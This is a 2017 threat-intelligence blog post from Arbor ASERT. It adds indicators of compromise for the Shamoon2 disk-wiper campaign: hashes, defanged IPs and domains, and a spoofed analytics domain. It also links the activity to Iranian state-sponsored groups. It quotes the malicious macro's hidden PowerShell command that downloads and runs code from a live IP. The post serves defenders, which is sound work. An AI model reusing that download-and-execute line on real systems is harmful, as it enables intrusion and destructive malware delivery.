**MENU** # Additional Insights on Shamoon2 By **[Neal Dennis](https://www.arbornetworks.com/blog/asert/author/e-j-dennis/)** on 02/21/2017. Posted in **[analysis](https://www.arbornetworks.com/blog/asert/category/analysis/)**, **[attack lifecycle](https://www.arbornetworks.com/blog/asert/category/attack-lifecycle/)**, **[Interesting Research](https://www.arbornetworks.com/blog/asert/category/interesting-research/)**, **[Malware](https://www.arbornetworks.com/blog/asert/category/malware/)**, **[threat analysis](https://www.arbornetworks.com/blog/asert/category/threat-analysis/)** . ###### IBM analysts recently unveiled a �rst look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia. Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon. Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign. While researching elements in the IBM report, ASERT discovered additional malicious domains, IP addresses, and artifacts. The basic functionality of the new documents and their PowerShell components matched what was previously disclosed. For more information on the overall capabilities of the malware, please review IBM’s ongoing research. It is our hope that by providing additional indicators, end-point investigators and network defenders will be able to discover and mitigate more Shamoon2 related compromises. Initial Discoveries The following new samples were likely delivered via similar spear phishing campaigns as described in IBM’s research. All three shared the same IPs and URLs, also provided below. These samples were located by pivoting on document attributes. In this case, a sample from the IBM report indicated the document author ‘gerry.knight’ which led us to the following three additional samples. MD5 ----- ###### d30b8468d16b631cafe458fd94cc3196 IPs 104.218.120[.]128 69.87.223[.]26 5.254.100[.]200 URLs analytics-google[.]org:69/checkFile.aspx analytics-google[.]org 69.87.223[.]26:8080/p The following is a screenshot of a macro-enabled document captured from sample 5e5ea1a67c2538dbc01df28e4ea87472: Once enabled the extracted macro executed the following: ‘powershell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(\’http://69.87.223.26:8080/p\’)”‘ Pivoting on Passive DNS ----- ###### g g [ ] [ ] this campaign was ongoing, November 2016. Researching the domain go-microstf[.]com, hosted at 45.63.10[.]99, revealed yet another iteration of malicious executables. In this case, a URL used to download the PowerShell component shared a naming convention found in the IBM report, http://69.87.223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples. The following are IOCs related to this domain: MD5 83be35956e5d409306a81e88a1dc89fd IPs 45.63.10[.]99 69.87.223[.]26 URLs go-microstf[.]com 69.87.223[.]26:8080/eiloShaegae1 go-microstf[.]com/check�le.aspx The domain go-microstf[.]com was originally set up to spoof Google Analytics login page. The following screenshot is from the malicious domain: ----- ###### Possible Connections to Iranian state-sponsored Kittens Finally, research yielded a relatively unique sample. This particular iteration was submitted to VirusTotal on September 16, 2016. The majority of samples analyzed to date were submitted no earlier than mid-October, with most being submitted in January 2017 or later. We were able to discover this particular version by diving further into connections to analytics-google[.]org. Unlike newer samples, this one created a unique �le ‘sloo.exe’. The �le was created at C:\Documents and Settings\Admin\Local Settings\Temp\sloo.exe. In addition to this �le, the sample also contacted 104.238.184[.]252 for the PowerShell executable. Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they’ve named Magic Hound. The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot con�rm the extent of any relationship between the two groups. ----- ###### p py g, y assessed with high-con�dence these activities are attributable to Iranian state- sponsored activities. IOCs for this version were: MD5 07d6406036d6e06dc8019e3ade6ee7de IPs 104.238.184[.]252 5.254.100[.]200 URLs analytics-google[.]org:69/checkFile.aspx Conclusion These additional IOCs will hopefully provide more context into the ongoing threat. The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors. The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems. Consolidated IOC list: MD5 2a0df97277ddb361cecf8726df6d78ac 5e5ea1a67c2538dbc01df28e4ea87472 d30b8468d16b631cafe458fd94cc3196 83be35956e5d409306a81e88a1dc89fd 07d6406036d6e06dc8019e3ade6ee7de IPs ----- ###### [ ] 5.254.100[.]200 45.63.10[.]99 104.238.184[.]252 URLs analytics-google[.]org:69/checkFile.aspx analytics-google[.]org 69.87.223[.]26:8080/p go-microstf[.]com 69.87.223[.]26:8080/eiloShaegae1 get.adobe.go-microstf[.]com go-microstf[.]com/check�le.aspx **Share this:** **[Share](javascript:void(0);)** **89** **[Share](https://www.facebook.com/sharer/sharer.php?app_id=249643311490&sdk=joey&u=https%3A%2F%2Fwww.arbornetworks.com%2Fblog%2Fasert%2Fadditional-insights-shamoon2%2F&display=popup&ref=plugin&src=share_button)** 6 [Tweet](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fwww.arbornetworks.com%2Fblog%2Fasert%2Fadditional-insights-shamoon2%2F&ref_src=twsrc%5Etfw&text=Additional%20Insights%20on%20Shamoon2&tw_p=tweetbutton&url=https%3A%2F%2Fwww.arbornetworks.com%2Fblog%2Fasert%2Fadditional-insights-shamoon2%2F) [3 points](https://www.reddit.com/r/Malware/comments/5vsxrn/additional_insights_on_shamoon2/) ###### Tags: disk wiper, IOCs, Iran, Saudi Arabia, Shamoon, Shamoon2 Leave a comment ###### Name * ###### E-mail * ###### Website S U B M I T C O M M E N T ###### SUBSCRIBE TO THIS BLOG ----- ###### Last Name Company Email ###### SUBSCRIBE ###### Arbor’s Security Engineering & Response Team (ASERT) delivers world-class network security research and analysis for the bene�t of today’s enterprise and network operators. ASERT engineers and researchers are part of an elite group of institutions that are referred to as ‘super remediators’ and represent the best in information security. ASERT has both visibility and remediation capabilities at nearly every tier one operator and a majority of service provider networks globally. ASERT shares operationally viable intelligence with hundreds of international Computer Emergency Response Teams (CERTs) and with thousands of network operators via in-band security content feeds. ASERT also operates the world’s largest distributed honeynet, actively monitoring Internet threats around the clock and around the globe via ATLAS, Arbor’s global network of sensors:® http://atlas.arbor.net. ###### TAG CLOUD [CSAC](https://www.arbornetworks.com/blog/asert/tag/csac/) [APT](https://www.arbornetworks.com/blog/asert/tag/apt/) [Buhtrap](https://www.arbornetworks.com/blog/asert/tag/buhtrap/) [Banking Trojans](https://www.arbornetworks.com/blog/asert/tag/banking-trojans/) [tra�c](https://www.arbornetworks.com/blog/asert/tag/traffic/) [Russia](https://www.arbornetworks.com/blog/asert/tag/russia/) [malware](https://www.arbornetworks.com/blog/asert/tag/malware-2/) [Internet Protocol](https://www.arbornetworks.com/blog/asert/tag/internet-protocol/) [hijack](https://www.arbornetworks.com/blog/asert/tag/hijack/) [Facebook](https://www.arbornetworks.com/blog/asert/tag/facebook/) [DNS](https://www.arbornetworks.com/blog/asert/tag/dns/) Denial -----